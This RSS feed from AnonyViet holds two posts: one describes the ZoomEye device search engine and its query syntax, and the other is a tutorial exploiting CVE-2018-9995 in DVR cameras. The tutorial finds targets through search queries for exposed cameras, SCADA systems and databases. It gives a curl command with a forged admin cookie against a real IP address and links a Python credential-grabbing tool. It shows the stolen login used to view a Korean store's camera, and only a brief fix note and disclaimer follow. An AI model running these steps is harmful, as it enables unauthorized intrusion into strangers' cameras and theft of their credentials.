<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	 xmlns:media="http://search.yahoo.com/mrss/" >

<channel>
	<title>ZoomEye &#8211; AnonyViet &#8211; English Version</title>
	<atom:link href="https://en.anonyviet.com/tag/zoomeye/feed/" rel="self" type="application/rss+xml" />
	<link>https://en.anonyviet.com</link>
	<description>The most popular website for sharing information technology, computer networks, and security knowledge. Stay up to date with the hottest news and tips</description>
	<lastBuildDate>Thu, 26 Jan 2023 03:21:14 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.0.1</generator>

<image>
	<url>https://en.anonyviet.com/wp-content/uploads/2023/01/cropped-ico-logo-75x75-1.png</url>
	<title>ZoomEye &#8211; AnonyViet &#8211; English Version</title>
	<link>https://en.anonyviet.com</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Zoomeye: Professional hacker&#8217;s search engine</title>
		<link>https://en.anonyviet.com/zoomeye-professional-hackers-search-engine/</link>
					<comments>https://en.anonyviet.com/zoomeye-professional-hackers-search-engine/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 03:21:14 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Engine]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[Professional]]></category>
		<category><![CDATA[search]]></category>
		<category><![CDATA[ZoomEye]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3608</guid>

					<description><![CDATA[Zoomeye is a website that searches for information related to network services, IPs, and ports on the Internet. This is a search engine for hackers and pentesters. There are many outstanding Zoomeye related news on the internet that you can find out. This search engine features easy-to-use functionality, flexible search settings, and its own API. [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>Zoomeye is a website that searches for information related to network services, IPs, and ports on the Internet.  This is a search engine for hackers and pentesters.  There are many outstanding Zoomeye related news on the internet that you can find out.  This search engine features easy-to-use functionality, flexible search settings, and its own API.  In this article, we will talk about the features that the Zoomeye search engine supports and compare the results of Zoomeye with Shodan.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-zoomeye-la-gi" class="ftwp-heading">What is Zoomeye?</h2>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.zoomeye.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Zoomeye</a> is a search engine developed by Chinese security company Knownsec Inc.  The first version was released in 2013. The 3rd version of the project is currently in use.  ZoomEye uses Xmap and Wmap to collect data from open web services/devices for analysis.</p>
<p><img post-id="3608" fifu-featured="1" fetchpriority="high" decoding="async" class="aligncenter wp-image-29064 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/321.jpg" alt="Zoomeye: Professional hacker&#8217;s search engine" title="Zoomeye: Professional hacker&#8217;s search engine"s search engine" width="768" height="435" srcset="https://anonyviet.com/wp-content/uploads/2021/07/321.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/321-300x170.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/321-750x425.jpg 750w" sizes="(max-width: 768px) 100vw, 768px" title="Zoomeye: Professional hacker's search engine 9"/></p>
<h2 id="ftoc-cach-su-dung-zoomeye" class="ftwp-heading">How to use Zoomeye?</h2>
<p>On the Zoomeye website, you can enter multiple requests at once and see the results, but more detailed information will show up later. <strong>subscribe to Zoomeye</strong>.  To register, you need to specify <strong>email and phone number</strong> mine.  After registration, the extended features will activate and there are no restrictions on the details on the server (in guest mode, only <strong>20 results displayed</strong>).  You can also view general statistics.</p>
<p><img decoding="async" loading="lazy" class="aligncenter wp-image-29065 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/322.jpg" alt="How to use Zoomeye?" width="768" height="370" srcset="https://anonyviet.com/wp-content/uploads/2021/07/322.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/322-300x145.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/322-750x361.jpg 750w" sizes="auto, (max-width: 768px) 100vw, 768px" title="Zoomeye: Professional hacker's search engine 10"/></p>
<p>Another very handy feature is the category.  User can choose <strong>any letter</strong> from the alphabet and choose <strong>device name,</strong> The search engine will display search results for this request.  Equipment list includes <strong>cameras, printers and other devices</strong>.  A separate list for WEB has been implemented, which includes all technologies and CMS.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-29066 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/323.jpg" alt="Zoomeye: Professional hacker's search engine 5" width="768" height="505" srcset="https://anonyviet.com/wp-content/uploads/2021/07/323.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/323-300x197.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/323-750x493.jpg 750w" sizes="auto, (max-width: 768px) 100vw, 768px" title="Zoomeye: Professional hacker's search engine 11"/></p>
<p>Not to mention the vulnerability database built into Zoomeye&#8217;s search process.  You can immediately see the details of the search results which list the device, which IP has<strong> Is there a security hole?</strong>.</p>
<p>The system has its own keywords (keywords) to help increase the accuracy of search results.  They are quite similar to Shodan and Censys.  These keywords can save you time, especially if you are looking for a specific version or a phrase in a meta tag, for example.</p>
<h2 id="ftoc-tim-kiem-theo-tu-khoa-tren-zoomeye" class="ftwp-heading">Search by keyword on Zoomeye</h2>
<h3 id="ftoc-tim-kiem-theo-ung-dung-va-phien-ban" class="ftwp-heading">Search by app and version</h3>
<p><strong>app:</strong> app name<br /><strong>ver: </strong>version</p>
<table border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr>
<td class="code">
<div class="container">
<p><code class="plain plain">Example: app:OpenSSH +ver:4.3</code></p>
</div>
</td>
</tr>
</tbody>
</table>
<h3 id="ftoc-tim-kiem-theo-vi-tri-dia-ly" class="ftwp-heading">Search by geographical location</h3>
<p><strong>country:</strong> country abbreviations (RU, US, PL, UK, UA, FR, etc.)<br /><strong>city:</strong> city</p>
<p><code>Example: country:Canada +city:Delta</code></p>
<h3 id="ftoc-tim-kiem-theo-port-va-he-dieu-hanh" class="ftwp-heading">Search by Port and OS</h3>
<p><strong>port:</strong> gate<br /><strong>os: </strong>operating system</p>
<p><code>Example: os:linux +port:22 +country:PL</code></p>
<div class="wp-block-syntaxhighlighter-code ">
<h3 id="ftoc-tim-kiem-theo-dich-vu-va-may-chu" class="ftwp-heading">Search by service and server</h3>
<p><strong>service:</strong> service name<br /><strong>hostname:</strong> server name</p>
<p><code>Example: service:ftp +hostname:www.microsoft.com</code></p>
<h3 id="ftoc-tim-kiem-theo-ip" class="ftwp-heading">Search by IP</h3>
<p><strong>ip:</strong> IP address<br /><strong>cidr:</strong> network address</p>
<p><code>Example: cidr:109.71.46.0/24</code></p>
<h3 id="ftoc-tim-kiem-theo-keyword" class="ftwp-heading">Search by keyword</h3>
<p><strong>site:</strong> webpage<br /><strong>keywords:</strong> key word<br /><strong>desc:</strong> description information<br /><strong>headers:</strong> The name of the HTTP header</p>
<p><code>Example: site:google.com +headers:Server</code></p>
<h3 id="ftoc-tim-kiem-theo-tieu-de" class="ftwp-heading">Search by title</h3>
<p><strong>title</strong>: page title</p>
<p><code>Example: title:hacked</code></p>
<h3 id="ftoc-cac-phat-hien-thu-vi" class="ftwp-heading">Interesting findings</h3>
<p><strong>Request</strong>: “ClearSCADA”</p>
<p>Access to an unsecured database, you can view the internal data of the system completely</p>
<p><code>Example:"ClearSCADA"</code></p>
<p><strong>Request:</strong> “beescms”</p>
<p>This is a CMS for Online Shops that has quite a few security holes.</p>
<p><code>"beescms"</code></p>
<h2 id="ftoc-cach-tim-kiem-webcam-tren-zoomeye" class="ftwp-heading">How to search webcam on zoomeye</h2>
<p><strong>Request</strong>: “Mobotix Camera http config”</p>
<p>Webcam Mobotix access without login.  Sometimes you will see devices such as garage door control systems, light switches/switches, etc.</p>
<p><code>speaker +app: "Mobotix Camera http config"</code></p>
<p><strong>Request:</strong>&#8220;mongodb&#8221;</p>
<p>Open mongodb database.  You can see what base and size.</p>
<p><code>"mongodb"</code></p>
<p><strong>Request</strong>: NessusWWW +”HTTP / 1.1 200 OK”</p>
<p>Access to Nessus vulnerability scanning software</p>
<p><code>NessusWWW +"HTTP / 1.1 200 OK"</code></p>
<h2 id="ftoc-so-sanh-giua-zoomeye-va-shodan" class="ftwp-heading">Comparison between Zoomeye and Shodan</h2>
<p>I will compare the results to see which search engine has better results.  In the test, we will use a comparison table for clarity and accessibility.  10 searches were performed and the table below shows the number of results for each query and the total.</p>
<p><img decoding="async" loading="lazy" class="size-full wp-image-29067 aligncenter" src="https://anonyviet.com/wp-content/uploads/2021/07/324.jpg" alt="Zoomeye: Professional hacker's search engine 6" width="524" height="340" srcset="https://anonyviet.com/wp-content/uploads/2021/07/324.jpg 524w, https://anonyviet.com/wp-content/uploads/2021/07/324-300x195.jpg 300w" sizes="auto, (max-width: 524px) 100vw, 524px" title="Zoomeye: Professional hacker's search engine 12"/></p>
<p>For 10 queries, 890,868,935 results were found from the two search engines.  Of these, only 13% from Shodan and 87% from Zoomeye.  A simple and intuitive comparison of why hackers love using Zoomeye.  An overwhelming statistical advantage.  In all 10 searches, Zoomeye has a clear advantage.  But shodan also has its own advantages, <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fshodan-eye-cong-cu-thu-thap-thong-tin-tat-ca-cac-thiet-bi-ket-noi-internet%2F" rel="noopener" class="local-link">read this post</a> to find out more.</p>
<h2 id="ftoc-ket-luan" class="ftwp-heading">Conclusion</h2>
<p>Zoomeye is a great search engine for Hackers.  Convenient function, enough keywords to search, API and a lot of search results.  You just need to sign up for Zoomeye.  The system does not limit the number of requests and allows searching for almost any task (limited to 10,000 requests per month).  Enough for you to play with.</p>
</div>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;29063&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/zoomeye-professional-hackers-search-engine/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/07/321.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995</title>
		<link>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/</link>
					<comments>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Thu, 26 Jan 2023 02:56:00 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Camera]]></category>
		<category><![CDATA[CVE20189995]]></category>
		<category><![CDATA[Exercise]]></category>
		<category><![CDATA[Hack]]></category>
		<category><![CDATA[Vulnerable]]></category>
		<category><![CDATA[ZoomEye]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=3590</guid>

					<description><![CDATA[As in the previous post, I have About ZoomEye – Search engine for Hackers. Zoomeye is similar to Shodan but developed for the Chinese market. This is a search engine that just needs to enter an IP or a keyword, the results will show: open ports, related services, geographic location&#8230; Today we will try to [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div id="ftwp-postcontent">
<p><strong>As in the previous post, I have <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fzoomeye-cong-cu-tim-kiem-cua-hacker-chuyen-nghiep%2F" rel="noopener" class="local-link">About ZoomEye</a> – Search engine for Hackers.  Zoomeye is similar to Shodan but developed for the Chinese market.  This is a search engine that just needs to enter an IP or a keyword, the results will show: open ports, related services, geographic location&#8230; Today we will try to practice using ZoomEye to find the items. Camera is vulnerable to CVE-2018-9995 and access to view that Camera.</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<h2 id="ftoc-tim-camera-bi-lo-hong-cve-2018-9995-bang-zoomeye" class="ftwp-heading">Find Cameras with CVE-2018-9995 Vulnerability Using ZoomEye</h2>
<p><strong>This is a security vulnerability discovered in 2018 related to Camera DVR recorders.  With just a single command line, you can view the unencrypted Camera login account.  Currently in the world there are many Camera receivers that have not been patched with this version, and we can easily find them using the ZoomEye tool.</strong></p>
<p>Now we will practice with the ZoomEye search engine to find the camera with vulnerability CVE-2018-9995.</p>
<p>Open page <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fwww.zoomeye.org%2F" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">ZoomEye</a> and type login.rsp to find IPs associated with this keyword.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fzoomeye-hack-camera.jpg" rel="noopener" class="local-link"><img decoding="async" class="aligncenter size-full wp-image-29132" src="https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera.jpg" alt="zoomeye hack camera" width="1055" height="329" srcset="https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera.jpg 1055w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-300x94.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-1024x319.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-768x239.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/zoomeye-hack-camera-750x234.jpg 750w" sizes="(max-width: 1055px) 100vw, 1055px" title="Exercise: Using ZoomEye Hack Camera Vulnerability CVE-2018-9995 11"/></a></p>
<p>The result will be a list of IP addresses, click on the black arrow to access those addresses.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcach-dung-dung-zoomeye-1-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29133" src="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1.jpg" alt="How to use zoomeye? " width="530" height="611" srcset="https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1.jpg 530w, https://anonyviet.com/wp-content/uploads/2021/07/cach-dung-dung-zoomeye-1-1-260x300.jpg 260w" sizes="auto, (max-width: 530px) 100vw, 530px" title="Exercise: Using ZoomEye Hack Camera Vulnerable CVE-2018-9995 12"/></a></p>
<p>For example, we find the IP: <strong>http://59.18.152.180:9000</strong>.  Now I will exploit the vulnerability to find the user/password to log into this Camera.</p>
<h2 id="ftoc-dung-lenh-curl" class="ftwp-heading">Using the Curl . command</h2>
<p><strong>Use the syntax:</strong></p>
<p><code>curl "http://IP:Port/device.rsp?opt=user&amp;cmd=list" -H "Cookie: uid=admin"</code></p>
<p>Open CMD and use the following command:</p>
<p><code>curl "http://59.18.152.180:9000/device.rsp?opt=user&amp;cmd=list" -H "Cookie: uid=admin"</code></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fhack-camera-CVE-2018-9995.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29134" src="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995.jpg" alt="hack camera CVE-2018-9995" width="1068" height="118" srcset="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995.jpg 1068w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-300x33.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-1024x113.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-768x85.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-CVE-2018-9995-750x83.jpg 750w" sizes="auto, (max-width: 1068px) 100vw, 1068px" title="Exercise: Using ZoomEye Hack Camera Vulnerability CVE-2018-9995 13"/></a></p>
<p>There are results: <strong>UID:</strong> is the username, and<strong> pwd:</strong> is the password.</p>
<p>You open the browser <strong>Internet Explorer</strong> Go up, access the hacked IP camera to log in to the camera driver.  Mind <strong>Enable ActiveX</strong> Please browse to see the image.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fdung-zoomeye-hack-cam.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-29135" src="https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam.jpg" alt="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 4" width="881" height="508" srcset="https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam.jpg 881w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-300x173.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-768x443.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/dung-zoomeye-hack-cam-750x432.jpg 750w" sizes="auto, (max-width: 881px) 100vw, 881px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 14"/></a></p>
<p>And this is the Camera of a certain store, in Korea.</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fcamera-zoomeye-1-1-1.jpg" rel="noopener" class="local-link"><img post-id="3590" fifu-featured="1" decoding="async" loading="lazy" class="aligncenter size-full wp-image-29136" src="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg" alt="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995" width="716" height="362" srcset="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg 716w, https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1-300x152.jpg 300w" sizes="auto, (max-width: 716px) 100vw, 716px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 15"/></a></p>
<p>This is a python tool used to find the username/password of vulnerable cameras CVE-2018-9995.  Therefore, it is required that you have Python installed on your computer.  This tool can work on Windows.</p>
<p>You first <a target="_blank" href="https://en.anonyviet.com/next-link/?url=https%3A%2F%2Fcodeload.github.com%2Fanonyvietofficial%2FCVE-2018-9995_dvr_credentials%2Fzip%2Frefs%2Fheads%2Fdev_tool" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Download Tool getDVR_Credentials</a>.  Extract to C: drive, open CMD to access the decompression path:</p>
<p><code>cd C:\CVE-2018-9995_dvr_credentials-dev_tool</code></p>
<p><code>pip install -r requirements</code></p>
<p><code>python getDVR_Credentials.py --host IP --port Port</code>  // IP and Port of Camera.</p>
<p>For the above example, we will type the command</p>
<p><code>python getDVR_Credentials.py --host 59.18.152.180 --port 9000</code></p>
<p>And this is the result:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2021%2F07%2Fhack-camera.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-29137 size-full" src="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera.jpg" alt="hack camera CVE-2018-9995" width="1511" height="539" srcset="https://anonyviet.com/wp-content/uploads/2021/07/hack-camera.jpg 1511w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-300x107.jpg 300w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-1024x365.jpg 1024w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-768x274.jpg 768w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-750x268.jpg 750w, https://anonyviet.com/wp-content/uploads/2021/07/hack-camera-1140x407.jpg 1140w" sizes="auto, (max-width: 1511px) 100vw, 1511px" title="Exercise: Using ZoomEye Hack Camera vulnerable to CVE-2018-9995 16"/></a></p>
<p><strong>How to fix vulnerability CVE-2018-9995:</strong> Change the login account and update the Camera to the latest Firmware.</p>
<p><strong>When you find that the camera is flawed, try to notify the owner so they can contact a technician to handle it.</strong></p>
<p><em>Although considered a &#8220;hacker-friendly&#8221; search engine, ZoomEye is not designed to initiate attacks on network devices or websites.  The data recorded is for security research only. And this article is mainly for research purposes, please do not use it to break the law.</em></p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;29130&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
</div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exercise-using-zoomeye-hack-camera-vulnerable-to-cve-2018-9995/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2021/07/camera-zoomeye-1-1-1.jpg" medium="image"></media:content>
            	</item>
	</channel>
</rss>
